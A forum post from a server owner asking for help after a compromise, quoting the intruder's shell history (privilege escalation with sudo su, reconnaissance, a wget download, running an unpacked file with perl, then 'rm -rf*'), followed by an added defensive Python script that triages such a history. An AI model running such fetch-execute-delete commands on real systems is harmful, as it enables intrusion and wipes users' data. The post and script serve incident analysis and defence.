Hi everyone,
My server has been hacked.
I noticed that I couldn't access its files remotely, so I had a closer look. There were no files in my home folder.
I looked at the log of commands, and this is what I found.
sudo su
pwd
ls -a
w
id
uname -a
wget <some file>
unzip root.txt.zip
perl root.txt
ls
id
rm -rf*
exit -0
Does anyone have any advice? How did they get my password after inputting 'sudo su'? Should I reinstall the OS? Is there anything I can do to safeguard against this in the future? Is this a bot or human?
I know it's too late this time, but I don't want this to happen again, to me or anyone.
All comments appreciated.
Thanks
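
A triage pass over the history quoted in the post, as an added example that is not part of the original post: it labels each command with a stage and flags an interpreter run on a file that was just unpacked, and a recursive delete that follows a download. The stage names and command sets are assumptions chosen for illustration, and because shell history can be edited by whoever held the account, the output is a lead rather than proof.

```python
import shlex

# The history lines from the post, copied verbatim as sample input.
HISTORY = ["sudo su", "pwd", "ls -a", "w", "id", "uname -a", "wget <some file>",
           "unzip root.txt.zip", "perl root.txt", "ls", "id", "rm -rf*", "exit -0"]

# Illustrative stage rules (an assumption of this example, not a standard).
STAGES = {
    "recon": {"pwd", "ls", "w", "id", "uname", "whoami"},
    "fetch": {"wget", "curl"},
    "unpack": {"unzip", "tar", "gunzip"},
    "execute": {"perl", "python", "python3", "sh", "bash", "php"},
}

def classify(line):
    """Map one history line to (stage, argv)."""
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes: fall back to a whitespace split
        argv = line.split()
    if not argv:
        return "other", argv
    cmd = argv[0].rsplit("/", 1)[-1]  # tolerate /usr/bin/wget style paths
    if cmd in ("sudo", "su"):
        return "privilege", argv
    if cmd == "rm" and any(a.startswith("-") and "r" in a and "f" in a for a in argv[1:]):
        return "destroy", argv
    for stage, names in STAGES.items():
        if cmd in names:
            return stage, argv
    return "other", argv

def triage(lines):
    """Return (stages in order of first appearance, list of findings)."""
    seen, unpacked, findings = [], set(), []
    for n, line in enumerate(lines, 1):
        stage, argv = classify(line)
        if stage == "unpack":
            # Remember archive names minus their last extension (root.txt.zip -> root.txt).
            unpacked.update(a.rsplit(".", 1)[0] for a in argv[1:] if "." in a)
        if stage == "execute" and any(a in unpacked for a in argv[1:]):
            findings.append((n, "interpreter run on freshly unpacked file", line))
        if stage == "destroy" and "fetch" in seen:
            findings.append((n, "recursive delete after a download", line))
        if stage not in seen:
            seen.append(stage)
    return seen, findings

if __name__ == "__main__":
    order, hits = triage(HISTORY)
    print(" -> ".join(order))
    for n, why, line in hits:
        print(f"line {n}: {why}: {line}")
```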